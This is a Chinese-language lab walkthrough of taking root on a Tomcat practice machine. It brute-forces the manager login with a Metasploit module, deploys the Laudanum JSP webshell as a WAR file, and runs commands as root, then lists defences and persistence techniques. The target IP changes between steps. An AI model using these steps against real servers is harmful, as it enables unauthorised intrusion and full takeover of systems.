记一次对Tomcat网页靶机提权实录
字数 1282 2025-08-18 11:37:49
Tomcat网页靶机提权技术详解
1. 环境准备
-
启动数据库服务:
- 在root终端中执行命令启动数据库服务,为Metasploit提供支持
-
启动Metasploit控制台:
- 使用命令
msfconsole启动Metasploit框架
- 使用命令
2. 攻击流程
2.1 暴力破解Tomcat管理器
-
加载合适的Metasploit模块:
use auxiliary/scanner/http/tomcat_mgr_login -
查看模块参数:
show options -
设置目标主机:
set RHOSTS 192.168.56.102 set RPORT 8080 -
优化攻击参数:
set THREADS 5 # 增加线程数提高速度 set BRUTEFORCE_SPEED 3 # 降低爆破速度避免服务器崩溃 -
执行攻击:
run- 成功后会显示有效的凭据(示例中为root:owaspbwa)
2.2 利用Tomcat管理器上传Webshell
-
访问Tomcat管理器:
- URL:
http://192.168.56.102:8080/manager/html - 使用获取的凭据登录
- URL:
-
上传WAR格式的Webshell:
- 在Kali Linux中使用Laudanum工具集中的Webshell:
/usr/share/laudanum/jsp/cmd.war - 在管理器界面点击"Browse"选择文件后点击"Deploy"
- 在Kali Linux中使用Laudanum工具集中的Webshell:
-
验证部署:
- 确认新应用"cmd"出现在应用列表中
2.3 通过Webshell执行命令
-
访问Webshell:
- URL:
http://192.168.176.130:8080/cmd/cmd.jsp
- URL:
-
执行系统命令:
- 测试命令:
ifconfig(查看网络配置) - 权限检查:
whoami(确认当前用户权限) - 示例中发现Tomcat以root权限运行,获得完全控制权
- 测试命令:
3. 技术原理
-
Tomcat管理器漏洞:
- 默认配置的Tomcat服务器容易暴露Web应用管理器
- 弱口令或默认凭据导致暴力破解可行
-
WAR部署机制:
- Tomcat能够接受WAR格式的Java Web应用并自动部署
- 利用此特性上传恶意Web应用
-
Laudanum工具集:
- Kali Linux内置的多语言Webshell集合
- 包含JSP格式的Webshell,适合Tomcat环境
-
权限提升:
- Tomcat服务以root权限运行时,通过Webshell获得root权限
- 可执行任意系统命令,完全控制系统
4. 防御措施
-
加强认证安全:
- 修改默认凭据
- 使用强密码策略
- 启用双因素认证
-
访问控制:
- 限制管理界面访问IP
- 使用防火墙规则保护8080端口
-
权限最小化:
- Tomcat服务不应以root权限运行
- 使用专用低权限用户
-
定期更新:
- 保持Tomcat版本最新
- 及时修补已知漏洞
-
安全审计:
- 监控部署的应用程序
- 记录管理操作日志
5. 扩展知识
-
其他Tomcat攻击向量:
- CVE-2024-50379 条件竞争导致命令执行
- Tomcat类加载器漏洞
- 反序列化漏洞利用
-
Webshell检测:
- 文件完整性监控
- 异常网络流量分析
- 行为检测机制
-
权限维持技术:
- 创建后门账户
- 安装持久化Webshell
- 计划任务设置
本技术文档详细记录了通过Tomcat管理器漏洞获取系统root权限的全过程,从环境准备到最终提权,涵盖了关键的技术细节和原理分析,同时提供了相应的防御建议。